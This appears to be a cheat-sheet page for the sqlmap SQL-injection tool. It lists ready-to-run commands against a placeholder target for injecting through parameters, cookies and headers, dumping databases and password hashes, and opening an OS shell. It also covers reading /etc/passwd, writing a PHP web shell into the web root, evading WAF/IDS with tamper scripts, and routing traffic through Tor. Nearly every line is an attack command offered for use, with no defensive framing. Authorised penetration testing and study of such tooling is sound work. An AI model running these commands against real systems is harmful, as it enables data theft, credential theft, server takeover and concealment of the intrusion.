Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Basic Usage
sqlmap -u "http://TARGET/page?id=1"
sqlmap -u "http://TARGET/page?id=1" --batch # Auto-answer prompts
sqlmap -u "http://TARGET/page?id=1" --dbs # List databases
Request Options
POST Data
sqlmap -u "http://TARGET/login" --data="user=admin&pass=test"
Cookie
sqlmap -u "http://TARGET/page?id=1" --cookie="PHPSESSID=abc123"
sqlmap -u "http://TARGET/page?id=1" -H "Authorization: Bearer TOKEN"
sqlmap -u "http://TARGET/page?id=1" -H "X-Forwarded-For: 127.0.0.1"
From Burp Request File
sqlmap -r request.txt
sqlmap -r request.txt -p id # Specify parameter
Custom Injection Point
sqlmap -u "http://TARGET/page" --data="id=1*" # * marks injection point
sqlmap -r request.txt --headers="X-Custom: test*"
Enumeration
sqlmap -u URL --dbs # Databases
sqlmap -u URL -D dbname --tables # Tables
sqlmap -u URL -D dbname -T users --columns # Columns
sqlmap -u URL -D dbname -T users --dump # Dump table
sqlmap -u URL -D dbname -T users -C user,pass --dump # Specific columns
sqlmap -u URL --dump-all # Dump everything
Current Info
sqlmap -u URL --current-user
sqlmap -u URL --current-db
sqlmap -u URL --hostname
sqlmap -u URL --is-dba
sqlmap -u URL --privileges
sqlmap -u URL --passwords # Hash dump
Techniques
sqlmap -u URL --technique=U # UNION only
sqlmap -u URL --technique=B # Boolean blind only
sqlmap -u URL --technique=T # Time-based blind only
sqlmap -u URL --technique=E # Error-based only
sqlmap -u URL --technique=S # Stacked queries only
sqlmap -u URL --technique=BEUST # All (default)
| Flag | Technique |
|---|
B | Boolean-based blind |
E | Error-based |
U | UNION query |
S | Stacked queries |
T | Time-based blind |
OS Shell & File Access
OS Shell
sqlmap -u URL --os-shell
sqlmap -u URL --os-cmd="whoami"
SQL Shell
sqlmap -u URL --sql-shell
File Read
sqlmap -u URL --file-read="/etc/passwd"
File Write
sqlmap -u URL --file-write="shell.php" --file-dest="/var/www/html/shell.php"
WAF / IDS Evasion
Tamper Scripts
sqlmap -u URL --tamper=space2comment
sqlmap -u URL --tamper=between,randomcase
sqlmap -u URL --tamper=charencode
Common Tampers
| Tamper | Description |
|---|
space2comment | Replace spaces with /**/ |
between | Replace > with NOT BETWEEN 0 AND |
randomcase | Random upper/lower case |
charencode | URL-encode characters |
equaltolike | Replace = with LIKE |
base64encode | Base64 encode payload |
apostrophemask | Replace ' with UTF-8 |
space2plus | Replace spaces with + |
List All Tampers
Other Evasion
sqlmap -u URL --random-agent
sqlmap -u URL --delay=2 # Delay between requests
sqlmap -u URL --time-sec=10 # Time-based wait
sqlmap -u URL --level=5 --risk=3 # Max detection
sqlmap -u URL --hpp # HTTP Parameter Pollution
sqlmap -u URL --threads=10
sqlmap -u URL --level=3 # 1-5, default 1
sqlmap -u URL --risk=2 # 1-3, default 1
| Level | Tests |
|---|
| 1 | GET/POST parameters |
| 2 | + Cookie |
| 3 | + User-Agent, Referer |
| 4 | + more payloads |
| 5 | + Host header |
Proxy & Tor
sqlmap -u URL --proxy="http://127.0.0.1:8080" # Burp proxy
sqlmap -u URL --tor --tor-type=SOCKS5 --check-tor
Second-Order Injection
sqlmap -r request.txt --second-url="http://TARGET/profile"
Quick Reference
| Task | Command |
|---|
| Auto scan | sqlmap -u URL --batch --dbs |
| Dump table | sqlmap -u URL -D db -T tbl --dump |
| OS shell | sqlmap -u URL --os-shell |
| Read file | sqlmap -u URL --file-read="/etc/passwd" |
| WAF bypass | sqlmap -u URL --tamper=space2comment --random-agent |
| From Burp | sqlmap -r request.txt -p param |
Sources